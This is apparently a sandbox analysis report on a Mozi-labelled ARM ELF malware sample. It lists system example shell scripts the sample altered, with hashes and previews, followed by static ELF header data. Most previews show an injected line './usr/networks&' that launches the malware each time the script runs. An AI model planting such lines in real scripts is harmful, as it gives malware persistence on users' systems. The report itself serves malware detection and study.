                                                                                                                  /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):792
                                                                                                                  Entropy (8bit):4.925184193549972
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):486
                                                                                                                  Entropy (8bit):5.198694046664742
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2904
                                                                                                                  Entropy (8bit):5.006955417229927
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                                  /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):637
                                                                                                                  Entropy (8bit):4.973192610623575
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14967
                                                                                                                  Entropy (8bit):5.111069408805373
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                                  /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):822
                                                                                                                  Entropy (8bit):5.456000973546581
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):617
                                                                                                                  Entropy (8bit):4.789300168717738
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1015
                                                                                                                  Entropy (8bit):4.896629241453442
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                                  /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):461
                                                                                                                  Entropy (8bit):5.204671186006819
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):92
                                                                                                                  Entropy (8bit):4.373538165973413
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):519
                                                                                                                  Entropy (8bit):5.218301073324955
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):633
                                                                                                                  Entropy (8bit):4.881818972878624
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.736279036741599
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2712
                                                                                                                  Entropy (8bit):5.4524991837552035
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                  /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2564
                                                                                                                  Entropy (8bit):5.346461718403454
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                                  MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                                  SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                                  SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                                  SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                  /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9649
                                                                                                                  Entropy (8bit):5.350733164859712
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                                  MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                                  SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                                  SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                                  SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                                  /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):46
                                                                                                                  Entropy (8bit):3.925523369006428
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                  Entropy (8bit):5.819679405566689
                                                                                                                  TrID:
                                                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                  File name:mozi.a.zip
                                                                                                                  File size:307960
                                                                                                                  MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                                  SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                                  SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                                  SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                                  SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                  File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                                  Static ELF Info

                                                                                                                  ELF header

                                                                                                                  Class:ELF32
                                                                                                                  Data:2's complement, little endian
                                                                                                                  Version:1 (current)
                                                                                                                  Machine:ARM
                                                                                                                  Version Number:0x1
                                                                                                                  Type:EXEC (Executable file)
                                                                                                                  OS/ABI:UNIX - System V
                                                                                                                  ABI Version:0
                                                                                                                  Entry Point Address:0x8194
                                                                                                                  Flags:0x4000002
                                                                                                                  ELF Header Size:52
                                                                                                                  Program Header Offset:52
                                                                                                                  Program Header Size:32
                                                                                                                  Number of Program Headers:5
                                                                                                                  Section Header Offset:307280
                                                                                                                  Section Header Size:40
                                                                                                                  Number of Section Headers:17
                                                                                                                  Header String Table Index:16

                                                                                                                  Sections

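| Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
| | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0 |
| .init | PROGBITS | 0x80d4 | 0xd4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
| .text | PROGBITS | 0x80f0 | 0xf0 | 0x34a98 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
| .fini | PROGBITS | 0x3cb88 | 0x34b88 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
| .rodata | PROGBITS | 0x3cb98 | 0x34b98 | 0xb9d0 | 0x0 | 0x2 | A | 0 | 0 | 8 |
| .ARM.extab | PROGBITS | 0x48568 | 0x40568 | 0x18 | 0x0 | 0x2 | A | 0 | 0 | 4 |
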